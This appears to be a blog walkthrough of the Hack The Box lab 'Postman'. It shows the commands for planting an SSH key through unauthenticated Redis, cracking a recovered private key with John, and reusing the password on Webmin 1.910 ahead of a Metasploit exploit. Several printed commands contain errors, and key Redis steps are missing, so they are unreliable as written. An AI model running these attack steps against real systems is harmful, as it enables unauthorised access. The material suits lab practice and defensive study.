Hacking Articles|Raj Chandel's Blog: Hack the Box: Postman Walkthrough

Today, we’re sharing another Hack Challenge Walkthrough box: POSTMAN design by The Cyber Geek and the machine is part of the retired lab, so you can connect to the machine using your HTB VPN and then start to solve the CTF.

The level of the Lab is set: Beginner to intermediate.

Task: Capture the user.txt and root.txt flags.

Penetration Methodologies

Network Scanning

· Nmap

Enumeration

· Redis

Initial Foothold

· Access SSH

Privilege Escalation

· Webmin

Network Scanning

As we know the machine IP of the victim, Nmap scans will begin with the identification of open ports and services across them.

nmap -A 10.10.10.160

We find port 80 open for HTTP from this scanning study, and port 22 open for SSH, too. In addition I have noticed port 1000 for webmin and the port 6379 for Redis is open.

Enumeration

The Redis security model is: “it’s totally insecure to let untrusted clients access the system, the ability to control the server configuration using the CONFIG command makes the client able to change the working directory of the program and the name of the dump file. This allows clients to write RDB Redis files at random paths, that is a security issue that may easily lead to the ability to run untrusted code as the same user as Redis is running”.

You can read more about it from here: http://antirez.com/news/96

Since we saw port 6379 is available for Redis, we try to communicate with this with the help of the redis client.

redis -cli -h 10.10.10.160

config get dir

We noticed, that Redis is insecure and not AUTH required, so we discovered ".ssh directory" for the redis as mentioned above, due to unsafe configuration we can transfer any file inside the server.

Further, I generate a ssh key pair using the ssh-keygen command given below:

ssh-keygen -t rsa -f raj

I have a key and my goal is to place it in the server memory and then move it to a file in such a way that the authorized keys file that results remains valid.

(echo -e "\n\n"; cat raj.pub; echo -e "\n\n") > foo.txt

cat foo.txt | redis-cli -h 10.10.10.160 -x set crackit

Initial Foothold

As we have uploaded our ssh key into server thus it’s time to connect with remote machine with the help following command

ssh -i raj redis@10.10.10.160

ls -la

cat .bash_history

Here we notice two things: first there is a user whose name is “Matt” and a file with name “id_rsa.bak”, let’s find out the path for this file.

so, with the help of find command we enumerate the path for id_rsa.bak file which lie inside /opt directory.

find /-user Matt 2>/dev/null

So id_rsa.bak file is actually the id_rsa private key, I copied it into a text file and saved it as hash.

Then we have used ssh2john to convert this SSH key into a crackable file with the help of John the ripper and further used the rockyou.txt wordlist for this.

python /us/share/john/ssh2john key > sshkey > hash

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Hmmm!! so we have obtained sshkey “computer2008” for the user Matt.

As we knew that webmin was running over port 10000 thus we navigate to web browser and explore the URL where we submit above enumerated creds.

https://10.10.10.160:10000

username: Matt

Password: computer2008

Boom! We logged in successfully and notice the installed version for webmin i.e. 1.910; now we can search for its exploit if available.

With the help of searchsploit we found a Metasploit module for exploiting remote command execution. This module exploits an arbitrary command execution vulnerability in Webmin 1.910 and lower versions. Any user authorized to the "Package Updates" module can execute arbitrary commands with root privileges.